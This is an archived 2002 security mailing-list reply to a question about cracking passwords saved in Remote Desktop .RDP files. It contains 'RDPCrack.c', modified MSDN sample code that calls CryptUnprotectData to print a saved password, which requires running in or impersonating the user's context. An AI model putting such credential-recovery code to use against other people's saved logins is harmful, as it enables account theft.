Re: Saved Terminal Server Sessions

From: Nicolas RUFF (nicolas.ruff@edelweb.fr)
Date: Tue Dec 31 2002 - 05:02:54 EST

• Next message: Michael Howard: "RE: Saved Terminal Server Sessions"
• Previous message: Fred Mobach: "Re: Re-opening an old thread: NetWare-Enterprise-Web-Server/5.1 --As sistence requested."
• Maybe in reply to: st0ff st0ff: "Saved Terminal Server Sessions"
• Next in thread: Michael Howard: "RE: Saved Terminal Server Sessions"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

st0ff st0ff wrote:
> Hi all -
> Terminal Server Client or Remote Desktop Client are
> providing to save the appropriate user credentials. A
> plaintext file is used for that. But the password is
> encrypted in there. Is there a tool available to crack
> this?

Hi,

I guess you are talking about ".RDP" files. The password is encrypted
using the CryptProtectData() standard API. You can use the code below
(from MSDN), to decrypt it ; however you will have to impersonate the
user somehow to make this code run, because the encryption key used is
derivated from the user context (the Windows logon password I guess).

- Nicolas RUFF
-----------------------------------
Security Consultant @ EdelWeb
nicolas.ruff@edelweb.fr
-----------------------------------

//--------------------------------------------------------------------
// RDPCrack.c
//
// This is modified sample code from MSDN
// This code requires Windows 2000 or XP
// Don't forget to link CRYPT32.LIB
//

#include <stdio.h>
#include <windows.h>
#include <wincrypt.h>

void HandleError(char *s);

void main()
{
DATA_BLOB DataOut;
DATA_BLOB DataVerify;
LPWSTR pDescrOut = NULL;
BYTE *pbDataOutput;
DWORD cbDataOutput;
int data;

// Put encrypted password string here
char szEncodedPwd[] =
"01000000D08C9DDF0115D1118C7A00C04FC297EB01000000A5C6A9949D6D804898C50378542C8AE40000000008000000700073007700000003660000A800000010000000803859282E66C6AFF273047E0D9C1D8A0000000004800000A000000010000000E60DE7216CBEC1F108E86A1A21D7CDA1080200009878C213C72E84F0777A4D9E0B3F339906618C3F07727A79E1E1E923FCF50B3C5514246AD4117ADCFD4CF603AD5EEDA2A1692AFB4CAF32FEE468B6E6C564FAADFC64E901CE784CA72081DF762B15D498F2C2488F9AAFC271B5B7D1DA2A4AA0B585605024BCC18141213E6C9CBF3FCB1E2F032693580E63589D4342C8038E289F179147AA85B06462E35F6C2E83C29BCA2EDACC754F76A3D7DAA666EDF5D615036BAE280211B602D3F931F7AC22C26D5B3C1E7360757FE4CBAF3D5BAD23F1F06A6572F79A81552600E7F44535935F3908B6642E382D19FD7072C87174EF4144FA724368827DB7ACAA412242FDC2150595A43974FF5C3BA18CE764F46C2F783740A6C250FC5F9350A09804C0E776BFE6B9D10F60E219FC078F02E13F90DD9730FC598EBABE4AAB75C5C64D3A51BB0CC90470AAB85A921384C929012A60A68BC893D3AA320032836B40D43637789724C2DE79217DA3BA7E7754448904997DAFBB308EAD210ED51FAF1F8C5ABD6B057F728AE1F836974A1D

58017821C804EB2B1DB3897F7F31247CA55377379F1B05D69F2BDEAC5BE5BFD95E754F4A69D2301222C72AE2200200092E56C69F66E15913E13B821CA78BEA70DC8CA2F682EFE01E69B52E6218FE5FB5FAFF0DA7E17257748F1B35F0E3507D7A13146CBDFF6155FEE6B8CEF2F5CFF1E0D66D0B5D7C4234E07D23319BA1C6317C0CDAA9A80499DD4B57A66886A677E631744714000000257F2ED4678E73B1D0CF2338B471F6A507A7FE9F0";

// String conversion
cbDataOutput = ( (strlen(szEncodedPwd)) / 2 );
pbDataOutput = (BYTE *)malloc( cbDataOutput + 1 );
if (pbDataOutput == NULL) HandleError("Not enough memory.");

for (unsigned int i=0; i<(cbDataOutput); i++) {
     sscanf(&(szEncodedPwd[i+i]), "%02x", &data);
     pbDataOutput[i] = data;
}
DataOut.pbData = pbDataOutput;
DataOut.cbData = cbDataOutput;

// Decryption
if (CryptUnprotectData(
         &DataOut, // [in] Input data
     &pDescrOut, // (Optional) [out] Description string
         NULL, // (Optional) [in] Entropy (not used by MS)
         NULL, // Reserved
         NULL, // (Optional) PromptStruct
         0, // Flags
         &DataVerify)) // [out] Output data
{
     wprintf(L"The decrypted data is: %s\n", (WCHAR *)DataVerify.pbData);
     printf("The description of the data was: %S\n", pDescrOut);
}
else
{
     HandleError("Decryption error!");
}

LocalFree(pDescrOut);
free(DataOut.pbData);
LocalFree(DataVerify.pbData);
}

void HandleError(char *s)
{
     fprintf(stderr, "An error occurred in running the program. \n");
     fprintf(stderr, "%s\n",s);
     fprintf(stderr, "Error number %x.\n", GetLastError());
     fprintf(stderr, "Program terminating. \n");
     exit(1);
}

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

• Next message: Michael Howard: "RE: Saved Terminal Server Sessions"
• Previous message: Fred Mobach: "Re: Re-opening an old thread: NetWare-Enterprise-Web-Server/5.1 --As sistence requested."
• Maybe in reply to: st0ff st0ff: "Saved Terminal Server Sessions"
• Next in thread: Michael Howard: "RE: Saved Terminal Server Sessions"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:26 EDT